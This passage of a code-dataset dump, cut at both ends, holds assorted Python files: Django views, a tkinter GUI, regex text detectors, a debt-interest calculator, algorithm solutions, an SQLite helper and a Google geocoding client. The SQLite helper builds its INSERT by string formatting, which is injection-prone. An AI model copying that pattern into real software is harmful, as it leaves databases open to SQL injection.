project_code,\n name=project_name,\n Contract_value = project_contract_val,\n projtype_id = project_type,\n address = project_address,\n customer_id = project_cust,\n start = project_start,\n end = project_end\n )\n projects.save()\n response_data['result'] = 'Update work successful!'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n\n elif hAction == 'delete':\n project_id = Projects.objects.get(name=project_name)\n print(project_id.pk)\n projects = Projects(\n pk=project_id.pk,\n pcode = project_code,\n name=project_name,\n Contract_value = project_contract_val,\n projtype_id = project_type,\n address = project_address,\n customer_id = project_cust,\n start = project_start,\n end=project_end\n )\n projects.delete()\n response_data['result'] = 'delete work successful!'\n\n return HttpResponse(json.dumps(response_data),content_type=\"application/json\" )\n else:\n response_data['result'] = 'Nothing'\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\" )\n","sub_path":"construction/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107102444","text":"from tkinter import *\nimport os\nclass testapp(Tk):\n def __init__(self,parent):\n Tk.__init__(self,parent)\n self.parent=parent\n self.initialize()\n def initialize(self):\n # It's usually best to have the portion of code which creates all the GUI elements (button, text fields...) separate from the logic of the program.\n # That's why we create the initialize() method. We will create all our widgets (buttons, text field, etc.) in this method\n self.grid()#container to hold all the controls\n #textbox for inputing data\n self.entry=Entry(self)\n self.entry.grid(column=0,row=0,sticky='EW')\n self.entry.bind(\"\",self.OnPressEnter)\n #Button\n self.button=Button(self,text=\"open\",command=self.OnButtonClick)\n self.button.grid(column=1,row=0)\n label=Label(self,anchor=\"w\",fg=\"white\",bg=\"blue\")\n label.grid(column=0,row=1,columnspan=2,sticky=\"EW\")\n #list of invalid response\n self.listbox=Listbox(self,width=\"100\")\n self.listbox.grid(column=0,row=2,columnspan=2,sticky=\"EW\")\n\n #load data\n consumer_response_files_path_new=\"C:\\\\Users\\\\fengmingy\\\\Desktop\\\\CBA_Test\\\\CBA_Con_Expected_Resp_New\"\n for f in os.listdir(consumer_response_files_path_new):\n self.listbox.insert(END, os.path.join(consumer_response_files_path_new,f))\n\n #view invalid response button\n view=Button(self,text=\"View File\",command=self.OnButtonClick)\n view.grid(column=2,row=2)\n\n #reload_buttion\n reload_btn=Button(self,text=\"Reload\")\n view.grid(column=2,row=2)\n label=Label(self,anchor=\"w\",fg=\"white\",bg=\"blue\")\n label.grid(column=0,row=1,columnspan=2,sticky=\"EW\")\n self.grid_columnconfigure(0,weight=1)\n\n\n def OnButtonClick(self):\n index=self.listbox.curselection()[0]\n selected_text=self.listbox.get(index)\n print(selected_text)\n print ( 'you clicked me')\n def OnPressEnter(self,event):\n print (' you pressed enter')\n\n# Now we have a class, let's use it !\n# We create a main which is executed when the program is run from the command-line.\nif __name__==\"__main__\":\n app=testapp(None)\n app.title(\"Test Automation\")\n # It means that each program will now loop indefinitely, waiting for events (user clicking a button, pressing keys, operating system asking our application to quit, etc.).\n # window will display\n app.mainloop()\n","sub_path":"test_automation_webservices/test/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449032681","text":"\"\"\"Module containing test functions for Income Account/Statement zones.\"\"\"\n\nfrom re import finditer\nimport numpy as np\nimport pandas as pd\nimport re\n\ndef test_caps_income_account(value):\n \"\"\"Search zone content for 'INCOME ACCOUNT' string.\"\"\"\n\n def caps_ratio(value):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n cap_count = 0\n for char in value.replace(' ', ''):\n if char.isupper():\n cap_count += 1\n\n caps_ratio = cap_count / len(value.replace(' ', ''))\n return caps_ratio\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].*'\n print_test = r'[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}'\n\n if re.match(test_string, value):\n value_out = 0\n\n for match in finditer(print_test, value):\n if caps_ratio(match.group()) > .2:\n # print(match.span(), match.group())\n value_out = 1\n else:\n value_out = 0\n\n return value_out\n\ndef test_income_account(value):\n \"\"\"Search zone content for 'Income Account' string.\"\"\"\n\n test_string_account = r'.*[Iil][nm][coe0]{2}.{1,4}[Aa][coe0]{3}[u].*'\n print_test_account = r'[Iil][nm][coe0]{2}.{1,4}[Aa][coe0]{3}[u].{1,3}'\n\n if re.match(test_string_account, value):\n value_out = 0\n\n test_string_year = r'.*[Yy][er][as].{1,10}[Eet][no]d*.*'\n test_string_month = r'.*[Mm][o][n\\.].{1,9}[\\s][Eet][no]d*.*'\n test_string_period = r'.*[Pp][eo]ri.{1,30}[Eet]*[no]*d*.*'\n test_string_to = r'.*\\d{3,4}.{1,3}to.*'\n\n print_test_year = r'[Yy][er][as].{1,10}[Eet\\&][no]d*'\n print_test_month = r'[Mm][o][n\\.].{1,9}[\\s][Eet\\&][no]d*'\n print_test_period = r'[Pp][eo]ri.{1,30}[Eet\\&]*[no]*d*'\n print_test_to = r'\\d{3,4}.{1,3}to'\n\n if (re.match(test_string_year, value) or re.match(test_string_month, value) or\n re.match(test_string_period, value) or re.match(test_string_to, value)):\n\n match_beginning_year = []\n match_beginning_month = []\n match_beginning_period = []\n match_beginning_to = []\n\n for match in finditer(print_test_account, value):\n # print(match.span(), match.group())\n match_beginning = match.span()[0]\n match_end = match.span()[-1]\n\n for match in finditer(print_test_year, value):\n # print(match.span(), match.group())\n match_beginning_year.append(match.span()[0])\n\n for match in finditer(print_test_month, value):\n match_beginning_month.append(match.span()[0])\n\n for match in finditer(print_test_period, value):\n match_beginning_period.append(match.span()[0])\n\n for match in finditer(print_test_to, value):\n match_beginning_to.append(match.span()[0])\n\n sub_match_list = match_beginning_year + match_beginning_month + match_beginning_period + match_beginning_to\n distance_list = [True for match in sub_match_list if abs(match_end - match) < 45]\n if any(distance_list):\n value_out = 1\n\n else:\n value_out = 0\n\n return value_out\n\ndef trailing_number_content(row):\n \"\"\"Search current or next zone string for high-density of numbers (indicating table).\"\"\"\n\n value_out = 0\n current_zone = str(row['text'])\n zone_next = str(row['zone_next'])\n\n def digit_ratio(test_string):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n digit_count = 0\n for char in test_string.replace(' ', ''):\n if char.isdigit():\n digit_count += 1\n\n digit_ratio = digit_count / len(test_string.replace(' ', ''))\n return digit_ratio\n\n def count_dollars(test_string):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n dollar_count = 0\n for char in test_string.replace(' ', ''):\n if char == '$' or char == '£':\n dollar_count += 1\n\n return dollar_count\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].*'\n print_test = r'[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}'\n\n if re.match(test_string, current_zone):\n for match in finditer(print_test, current_zone):\n # print(match.span(), match.group())\n # print(row.name)\n match_beginning = match.span()[0]\n len_to_end = len(current_zone) - match_beginning\n if len_to_end < 350:\n overflow = 350 - len_to_end\n test_string = current_zone[match_beginning:] + zone_next[:overflow]\n else:\n test_string = current_zone[match_beginning:match_beginning + 350]\n\n test_string_digit_ratio = digit_ratio(test_string)\n test_string_dollar_count = count_dollars(test_string)\n\n if test_string_digit_ratio > .15 and test_string_dollar_count > 3:\n value_out = 1\n\n return value_out\n\ndef test_trailing_colon(value):\n \"\"\"ID trailing colons and semi-colons\"\"\"\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}\\s*[\\;\\:].*'\n if re.match(test_string, str(value)):\n value_out = 1\n else:\n value_out = 0\n\n return value_out\n","sub_path":"zone_content_tools/zone_content_id/codebase/IncomeAccountOps.py","file_name":"IncomeAccountOps.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288888686","text":"#!/usr/bin/env python3\n'''\nSee docstring for class AmountIncreaseTrail\n'''\n\n# from datetime import date\n# from datetime import timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date\nimport calendar # for calendar.monthrange(year, month)\nimport json\n# import sys\n\n\ndef treat_date(p_date):\n if p_date is None:\n return None\n if type(p_date) == date:\n return p_date\n p_date = str(p_date)\n pp = p_date.split('-')\n if len(pp) < 3:\n return None\n try:\n year = int(pp[0])\n month = int(pp[1])\n day = int(pp[2])\n return date(year, month, day)\n except ValueError:\n pass\n return None\n\nclass AmountIncreaseTrail:\n '''\n This class stores the properties (attributes) of an \"Amount Increase Trail\" piece.\n An \"Amount Increase Trail\" piece stores a step-increase \"vector\" in a finance mora\n calculation.\n\n All steps (ie, a list of AIT's) will give the full evolution of a debt.\n '''\n\n def __init__(self,\n montant_ini,\n monthrefdate,\n restart_timerange_date, # not to be confused with restart_mora_date\n end_timerange_date, # ie restart_mora_date is end_timerange_date + 1 day\n interest_rate,\n corrmonet_in_month,\n paid_amount = None,\n finevalue = None,\n monthseqnumber = 1,\n contract_id = None\n ):\n '''\n Dynamic properties, ie derived fields, depend on other (original) fields (above)\n\n uptodate\n restart_mora_date\n was_fine_applied\n daysinmonth\n increaseamount\n updatedvalue\n balance\n\n self.uptodate\n => the same as end_timerange_date\n self.restart_mora_date\n => day after end_timerange_date\n self.was_fine_applied\n => if finevalue is not None, was_fine_applied is True; False otherwise\n self.daysinmonth\n => it calendar.monthrange(end_timerange_date)[1] (ie, total days in a month) of M+1\n OBS.: end_timerange_date AND restart_timerange_date MUST ALWAYS BE IN THE SAME MONTH/YEAR\n otherwise, an exception will be raised\n self.increaseamount\n => it's the interest plus corr.monet. applied to debt (it does not include fine)\n self.updatedvalue\n => it's debt plus increaseamount (as above, it also does not include fine)\n self.balance\n => it's the net result of bill minus payment and possibly financial increases if payment is late\n balance is also called forwardvalue, for, when it's not zero, it becomes either\n previousdebts or cred_amount in the following bill.\n '''\n self.montant_ini = montant_ini\n monthrefdate = treat_date(monthrefdate)\n self.monthrefdate = monthrefdate # this is never changed across an Amount Increase Trail list that shows the updating of a debt_account according to late payments!\n self.monthseqnumber = monthseqnumber\n self.contract_id = contract_id\n restart_timerange_date = treat_date(restart_timerange_date)\n self.restart_timerange_date = restart_timerange_date\n end_timerange_date = treat_date(end_timerange_date)\n self.end_timerange_date = end_timerange_date\n self.interest_rate = interest_rate\n self.corrmonet_in_month = corrmonet_in_month\n self.paid_amount = paid_amount # if not None, end_timerange_date equals semantically paydate\n self.finevalue = finevalue\n\n if self.restart_timerange_date is None:\n self.restart_timerange_date = self.monthrefdate + relativedelta(months=+1)\n if self.end_timerange_date is None:\n year = self.restart_timerange_date.year\n month = self.restart_timerange_date.month\n lastdayinmonth = calendar.monthrange(year, month)[1]\n self.end_timerange_date = self.restart_timerange_date.replace(day=lastdayinmonth)\n self.check_ini_n_end_dates_n_raise_if_consistent()\n\n\n\n @property\n def daysininterest(self):\n delta = self.end_timerange_date - self.restart_timerange_date\n days_in_range = delta.days + 1\n return days_in_range\n\n @property\n def monthfraction(self):\n return self.daysininterest / self.daysinmonth\n\n @property\n def updatefactor(self):\n return (self.interest_rate + self.corrmonet_in_month) * self.monthfraction\n\n @property\n def was_fine_applied(self):\n if self.finevalue is None:\n return False\n return True\n\n @property\n def restart_mora_date(self):\n '''\n formerly this method was called day_after_end_date()\n :return:\n '''\n return self.end_timerange_date + relativedelta(days=+1)\n\n def check_ini_n_end_dates_n_raise_if_consistent(self):\n iniyear = self.restart_timerange_date.year\n inimonth = self.restart_timerange_date.month\n fimyear = self.end_timerange_date.year\n fimmonth = self.end_timerange_date.month\n if (iniyear, inimonth) != (fimyear, fimmonth):\n error_msg = '(iniyear=%d, inimonth=%d) != (fimyear=%d, fimmonth=%d)' %(iniyear, inimonth, fimyear, fimmonth)\n raise ValueError(error_msg)\n\n @property\n def daysinmonth(self):\n self.check_ini_n_end_dates_n_raise_if_consistent()\n return calendar.monthrange(self.end_timerange_date.year, self.end_timerange_date.month)[1]\n\n @property\n def increaseamount(self):\n return self.montant_ini * self.updatefactor\n\n @property\n def updatedvalue(self):\n '''\n updatedvalue does not take into consideration 'fine'\n :return:\n '''\n return self.montant_ini + self.increaseamount\n\n @property\n def balance(self):\n '''\n balance was once called forwardvalue\n :return:\n '''\n multa = 0\n paid_amount = 0\n if self.finevalue is not None:\n multa = self.finevalue\n if self.paid_amount is not None:\n paid_amount = self.paid_amount\n return self.updatedvalue + multa - paid_amount\n\n def extract_lastdayofmonth_of_enddate(self):\n year = self.end_timerange_date.year\n month = self.end_timerange_date.month\n lastdayinmonth = calendar.monthrange(year, month)[1]\n lastdayofmonthdate = self.end_timerange_date.replace(day=lastdayinmonth)\n return lastdayofmonthdate\n\n @staticmethod\n def staticmethod_to_adjusted_dict_for_jsondump(obj):\n if obj is None:\n return None\n if type(obj) != AmountIncreaseTrail:\n return None\n return obj.to_adjusted_dict_for_jsondump()\n\n\n def to_json(self):\n # return json.dump(self, default=AmountIncreaseTrail.staticmethod_to_adjusted_dict_for_jsondump)\n return json.dumps(self.to_adjusted_dict_for_jsondump())\n\n def to_adjusted_dict_for_jsondump(self):\n '''\n adjusted here means date(yyyy, mm, dd) becomes 'yyyy-mm-dd', ie, from date type to string type\n\n self.montant_ini\n self.monthrefdate\n self.monthseqnumber\n self.contract_id\n self.restart_timerange_date\n self.end_timerange_date\n self.interest_rate\n self.corrmonet_in_month\n self.paid_amount\n self.finevalue\n\n :return:\n '''\n objsdict = self.__dict__\n # treat the 3 dates (monthrefdate ^ restart_timerange_date ^ end_timerange_date)\n monthrefdate = str(self.monthrefdate)\n objsdict['monthrefdate'] = monthrefdate\n restart_timerange_date = str(self.restart_timerange_date)\n objsdict['restart_timerange_date'] = restart_timerange_date\n end_timerange_date = str(self.end_timerange_date)\n objsdict['end_timerange_date'] = end_timerange_date\n return objsdict\n\n @staticmethod\n def from_json(jsonstr):\n objsdict = json.loads(jsonstr) #, encoding='utf-8', cls=AmountIncreaseTrail)\n return AmountIncreaseTrail(**objsdict)\n\n def __str__(self):\n fieldlist = [\n 'montant_ini', 'interest_rate', 'corrmonet_in_month',\n 'monthrefdate', 'restart_timerange_date', 'end_timerange_date',\n 'daysininterest', 'daysinmonth', 'monthfraction', 'updatefactor',\n 'increaseamount', 'updatedvalue', 'paid_amount',\n 'was_fine_applied', 'finevalue', 'balance',\n ]\n datadict = {}\n for f in fieldlist:\n exec(\"datadict['%s'] = self.%s\" %(f, f))\n monthyearref = '{0}/{1}'.format(self.monthrefdate.month, self.monthrefdate.year)\n outstr = '''\n =================\n Mês ref.: {0}\n ================='''.format(monthyearref)\n outstr += '''\n -> montante base = {montant_ini:.2f}\n -> alícota juros = {interest_rate:.2f}\n -> corr.monet. no mês = {corrmonet_in_month:.4f}\n -> data-início j+cm = {restart_timerange_date}\n -> data-até j+cm = {end_timerange_date} \n -> dias contados = {daysininterest}\n -> dias no mês = {daysinmonth}\n -> fração do mês (fm) = {monthfraction:.2f}\n -> fator atu(j+cm)*fm = {updatefactor:.4f}\n -> montante*(j+cm)*fm = {increaseamount:.2f}\n -> montante atualiz. = {updatedvalue:.2f}'''.format(**datadict)\n if self.paid_amount is not None and self.paid_amount > 0:\n outstr += '''\n -> pagamento = -{paid_amount}\n em {end_timerange_date}'''.format(**datadict)\n if self.was_fine_applied:\n outstr += '''\n -> incidência multa = {finevalue}'''.format(**datadict)\n outstr += '''\n ----------------------------------\n Saldo a pagar = {balance:.2f}\n em {end_timerange_date}\n ----------------------------------\n '''.format(**datadict)\n return outstr\n\ndef adhoctest():\n ait = AmountIncreaseTrail(\n montant_ini = 1000,\n monthrefdate = date(2017,1,1),\n restart_timerange_date = None,\n end_timerange_date = None,\n interest_rate = 0.01,\n corrmonet_in_month = 0.004,\n paid_amount = 800,\n finevalue = 100,\n )\n print (ait)\n\n ait = AmountIncreaseTrail(\n montant_ini = 2000,\n monthrefdate = date(2017,12,1),\n restart_timerange_date = date(2018,3,15),\n end_timerange_date = None,\n interest_rate = 0.01,\n corrmonet_in_month = 0.004,\n paid_amount = None,\n finevalue = None,\n )\n print (ait)\n print (ait.to_json())\n '''\n jsonrepr = json.dumps(ait, default=AmountIncreaseTrail.staticmethod_to_adjusted_dict_for_jsondump)\n print('jsonrepr =>', jsonrepr)\n obj = AmountIncreaseTrail.from_json(jsonrepr)\n print(obj)\n '''\n\n\nif __name__ == '__main__':\n adhoctest()\n\n# TO-DO: unit testing","sub_path":"models/AmountIncreaseTrailMod.py","file_name":"AmountIncreaseTrailMod.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540496590","text":"from typing import List\n\n\nclass Solution:\n\n def maxProfit(self, prices: List[int]) -> int:\n if not prices or len(prices) < 2:\n return 0\n\n dp = [[0, 0] for _ in range(len(prices))]\n\n dp[0][0] = 0\n dp[0][1] = - prices[0]\n\n for i in range(1, len(prices)):\n dp[i][0] = max(dp[i - 1][1] + prices[i], dp[i - 1][0])\n dp[i][1] = max(dp[i - 1][1], - prices[i])\n\n return dp[-1][0]\n\n\nsolution = Solution()\n\nassert solution.maxProfit([7, 6, 4, 3, 1]) == 0\nassert solution.maxProfit([7, 1, 5, 3, 6, 4]) == 5\nassert solution.maxProfit([2, 1, 2, 1, 0, 1, 2]) == 2\nassert solution.maxProfit([1, 2]) == 1\n","sub_path":"0121_best_time_to_buy_and_sell_stock.py","file_name":"0121_best_time_to_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485169757","text":"from .. import common\nimport datetime\nfrom .. import models\nfrom .. import TMSYS_ConfigChangeObjectPriority\ndef set_dict_detail_update_data(args, rank_code):\n ret_dict = set_dict_detail_insert_data(args, rank_code)\n del ret_dict['rec_id']\n ret_dict['modified_on'] = datetime.datetime.now()\n ret_dict['modified_by'] = common.get_user_id()\n return ret_dict\n\ndef set_dict_detail_insert_data(args, rank_code):\n ret_dict = dict()\n change_object = []\n object = {}\n object_name = \"\"\n column_name = \"\"\n if args.has_key('change_object') and args.has_key('object_code'):\n change_object = TMSYS_ConfigChangeObjectPriority.get_list({\"data\":{\"name\":\"TMChangeObjectRank\"}})\n for x in change_object:\n if x['change_object'] == args['change_object']:\n object = x\n break\n __collection = getattr(models, object['table_name'])()\n if object['change_object'] == 1:\n column_name = \"gjw_code\"\n ret = __collection.aggregate().project(gjw_code = 1, gjw_name = 1)\n object_name = ret.match(column_name + \" in {0}\", args['object_code']).get_item()['gjw_name']\n elif object['change_object'] == 2:\n column_name = \"job_w_code\"\n ret = __collection.aggregate().project(job_w_code = 1, job_w_name = 1)\n object_name = ret.match(column_name + \" in {0}\", args['object_code']).get_item()['job_w_name']\n elif object['change_object'] == 3:\n column_name = \"job_pos_code\"\n ret = __collection.aggregate().project(job_pos_code = 1, job_pos_name = 1)\n object_name = ret.match(column_name + \" == {0}\", args['object_code']).get_item()['job_pos_name']\n elif object['change_object'] == 4:\n column_name = \"emp_type_code\"\n ret = __collection.aggregate().project(emp_type_code = 1, emp_type_name = 1)\n object_name = ret.match(column_name + \" == {0}\", args['object_code']).get_item()['emp_type_name']\n else:\n return None\n\n ret_dict.update(\n rec_id = common.generate_guid(),\n rank_code = rank_code,\n change_object = (lambda x: x['change_object'] if x.has_key('change_object') else None)(args),\n object_level = None,\n object_code = (lambda x: x['object_code'] if x.has_key('object_code') else None)(args),\n object_name = object_name,\n priority_no = object['priority_no'],\n total_from = (lambda x: x['total_from'] if x.has_key('total_from') else None)(args),\n total_to = (lambda x: x['total_to'] if x.has_key('total_to') else None)(args),\n note = (lambda x: x['note'] if x.has_key('note') else None)(args),\n created_on = datetime.datetime.now(),\n created_by = common.get_user_id(),\n modified_on = \"\",\n modified_by = \"\"\n )\n return ret_dict","sub_path":"apps/performance/api/services/TMLS_RankService.py","file_name":"TMLS_RankService.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"478808821","text":"import numpy as np\nfrom scripts.utils.model_loader import load_model\nimport json\nfrom scripts.train_simple_nn import WINDOW_SIZE\nfrom scripts.utils.encoder import encode_input_window\nfrom scripts.utils.preparation import list_to_windows, Type\n\n\n# models = {\n# Type.EUK: load_model(Type.EUK),\n# Type.GRAMP: load_model(Type.GRAMP),\n# Type.GRAMN: load_model(Type.GRAMN)\n# }\n\ndef predict_sequences_json(sequences, model):\n collection = [predict_sequence_json(x, model) for x in sequences]\n return json.dumps(collection)\n\n\ndef predict_sequence_json(sequence, model):\n signal_predict, cleavarage_predict, muture_predict, sequence_cutted = predict_sequence(sequence.seq, model)\n return sequence.prediction_to_json(signal_predict.tolist(),\n cleavarage_predict.tolist(),\n muture_predict.tolist(), sequence_cutted)\n\n\ndef predict_sequence(sequence_str, model):\n prepared = prepare_seq(sequence_str, WINDOW_SIZE)\n predicted = model.predict(prepared)\n signal_predict = predicted[:, 0]\n cleavarage_predict = predicted[:, 1]\n muture_predict = predicted[:, 2]\n return signal_predict, cleavarage_predict, muture_predict, sequence_str[0:len(signal_predict)]\n\n\ndef prepare_seq(sequence, window_size=1):\n window_half = window_size >> 2 - 1\n prefixed = '-' * window_half + sequence[0:(70 + window_half)]\n chunked = list_to_windows(prefixed, window_size)\n encoded = np.array([encode_input_window(x) for x in chunked])\n return encoded","sub_path":"scripts/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473098692","text":"f = open(\"day2input.txt\")\n\ntwosList=[]\nthreesList=[]\n\nfor container in f:\n temp = list(container)\n if '\\n' in temp:\n temp.remove('\\n')\n \n for char in temp:\n if temp.count(char) == 2:\n if temp not in twosList:\n twosList.append(temp)\n elif temp.count(char) == 3:\n if temp not in threesList:\n threesList.append(temp)\n \n \nprint(len(twosList) * len(threesList))\n\n","sub_path":"day2-part1.py","file_name":"day2-part1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169863995","text":"class Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n map = {}\n for i in range(len(s)):\n map[s[i]] = map.setdefault(s[i],0) + 1\n map[t[i]] = map.setdefault(t[i],0) - 1\n for i in map:\n if map.get(i) != 0:\n return False\n return True","sub_path":"242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79647177","text":"import sqlite3 as sql\n\n\nclass sqlMaster:\n def __init__(self):\n self.open()\n # self.cur.execute(\"DROP TABLE urls\")\n # self.cur.execute(\"CREATE TABLE urls(localPath TEXT, destination TEXT)\")\n self.close()\n pass\n\n # print cur.execute(\"select * from images\").fetchall()\n\n def open(self):\n self.con = sql.connect('urls.db')\n self.cur = self.con.cursor()\n\n def insert(self, localPath, destination):\n self.open()\n self.cur.execute(\"INSERT INTO urls VALUES('%s', '%s')\" % (localPath, destination))\n self.close()\n # print self.getAll()\n\n def getAll(self):\n self.open()\n s = self.cur.execute(\"SELECT * FROM urls\").fetchall()\n self.close()\n l = list(s)\n x = []\n for r in l:\n x.append(list(r))\n return x\n\n def getAllDict(self):\n self.open()\n s = self.cur.execute(\"SELECT * FROM urls\").fetchall()\n self.close()\n dict = {}\n for tup in s:\n dict[tup[0]] = tup[1]\n return dict\n\n def close(self):\n self.cur.close()\n self.con.commit()\n self.con.close()\n\n def hasLocalPath(self, localPath):\n data = self.getAll()\n for entry in data:\n if entry[0].encode(\"ascii\") == localPath:\n return True\n return False\n","sub_path":"sqlMaster.py","file_name":"sqlMaster.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268943013","text":"\"\"\"\nPurpose:\nThis Class Contains Methods To Retrieve Geo Location Information From Google API.\n\nget_geo_coordinates_from_google: Retrieve Latitude and Longitude to a Given Address/Location\nget_lat_lng_altitude_from_google: Retrieve Altitude Information for a given Latitude and Longitude\nget_address_altitude_from_google: Retrieve Altitude Information for a given Address/Location\n\nDevelopers:\nKevin Patel (GitHub Username: PatelKeviin)\n get_geo_coordinates_from_google\n\nSponsor: DataDisca Pty Ltd. Australia\nhttps://github.com/DataDisca\n\"\"\"\nimport logging\nimport logging.config\nimport requests\n\n\nclass GeoCoordinatesGoogle:\n\n # Set Log Level\n logging.basicConfig(filename='./log/google_log.log',\n level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # Class Variables\n connection_params: dict = {}\n\n def __init__(self, api_key: str, output_format: str = 'json') -> None:\n \"\"\"\n Class Initializer\n @param output_format: Required Output Format\n @param api_key: Google API Key\n \"\"\"\n self.connection_params = {'output_format': output_format, 'api_key': api_key}\n\n @staticmethod\n def __get_error_msg(error_msg: str):\n \"\"\"\n purpose: Return an Error Object with a given Error Message\n @param error_msg: Error Message\n @return: Dict\n {\n 'status': False,\n 'message': error_msg,\n 'result': None\n }\n \"\"\"\n return {\n 'status': False,\n 'message': error_msg,\n 'result': None\n }\n\n def get_geo_coordinates_from_google(self, location_address: str) -> dict:\n \"\"\"\n purpose: Retrieve Latitude and Longitude to a Given Address/Location\n @param location_address: Latitude and Longitude needed Address/Location\n @return: Dict\n status: True or False based on success,\n message: Error message if an error occurred\n result:\n {\n 'latitude': Latitude of the Address Provided\n 'longitude': Longitude of the Address Provided\n }\n \"\"\"\n base_url = 'https://maps.googleapis.com/maps/api/geocode'\n endpoint = '{}/{}?address={}&key={}'.format(base_url,\n self.connection_params['output_format'],\n location_address,\n self.connection_params['api_key']\n )\n\n try:\n # make the GET request\n results = requests.get(endpoint).json()\n\n # check if codes were successfully obtained or not\n if results['status'] == 'OK':\n location = results['results'][0]['geometry']['location']\n\n return {\n 'status': True,\n 'message': None,\n 'result': {\n 'longitude': location['lng'],\n 'latitude': location['lat']\n }\n }\n\n elif results['status'] == 'ZERO_RESULTS':\n return self.__get_error_msg('Zero Results')\n except ConnectionError:\n return self.__get_error_msg('Connection Error')\n except TypeError:\n return self.__get_error_msg('Type Error')\n except Exception as e:\n return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n\n def get_altitude_from_google(self, latitude: float, longitude: float):\n \"\"\"\n purpose: Retrieve Latitude and Longitude to a Given Address/Location\n @param latitude: Latitude of the Location where Altitude is needed\n @param longitude: Longitude of the Location\n @return: Dict\n status: True or False based on success,\n message: Error message if an error occurred\n result:\n {\n 'latitude': Latitude of the given location\n 'longitude': Longitude of the given location\n 'altitude': Altitude of the given location\n }\n \"\"\"\n base_url = 'https://maps.googleapis.com/maps/api/elevation'\n endpoint = '{}/{}?locations={},{}&key={}'.format(base_url,\n self.connection_params['output_format'],\n latitude,\n longitude,\n self.connection_params['api_key']\n )\n\n try:\n # make the GET request\n results = requests.get(endpoint).json()\n\n # check if codes were successfully obtained or not\n if results['status'] == 'OK':\n altitude = results['results'][0]['elevation']\n location = results['results'][0]['location']\n return {\n 'status': True,\n 'message': None,\n 'result': {\n 'latitude': location['lat'],\n 'longitude': location['lng'],\n 'altitude': altitude\n }\n }\n\n elif results['status'] == 'ZERO_RESULTS':\n return self.__get_error_msg('Zero Results')\n except ConnectionError:\n return self.__get_error_msg('Connection Error')\n except TypeError:\n return self.__get_error_msg('Type Error')\n except Exception as e:\n return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n\n def get_address_altitude_from_google(self, location_address: str):\n \"\"\"\n purpose: Retrieve Latitude and Longitude to a Given Address/Location\n @param location_address: Latitude and Longitude needed Address/Location\n @return: Dict\n status: True or False based on success,\n message: Error message if an error occurred\n result:\n {\n 'latitude': Latitude of the given location\n 'longitude': Longitude of the given location\n 'altitude': Altitude of the given location\n }\n \"\"\"\n try:\n lat_long = self.get_geo_coordinates_from_google(location_address)\n if lat_long['status']:\n latitude = lat_long['result']['latitude']\n longitude = lat_long['result']['longitude']\n resp = self.get_altitude_from_google(latitude, longitude)\n return {\n 'status': True,\n 'message': None,\n 'result': {\n 'latitude': resp['result']['latitude'],\n 'longitude': resp['result']['longitude'],\n 'altitude': resp['result']['altitude']\n }\n }\n else:\n return lat_long\n\n except ConnectionError:\n return self.__get_error_msg('Connection Error')\n except TypeError:\n return self.__get_error_msg('Type Error')\n except Exception as e:\n return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n","sub_path":"GeoCoordinatesGoogle.py","file_name":"GeoCoordinatesGoogle.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123979697","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\n\nimport views\n\n\nurlpatterns = patterns(\n '',\n url(r'^login/(?P\\d+)/$', views.LoginView.as_view(), name='login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout',\n {'next_page': '/'}, name='logout'),\n)\n","sub_path":"dj_tools/dev/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417856308","text":"# -*- coding: utf-8 -*-\n\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.constants import ALL, 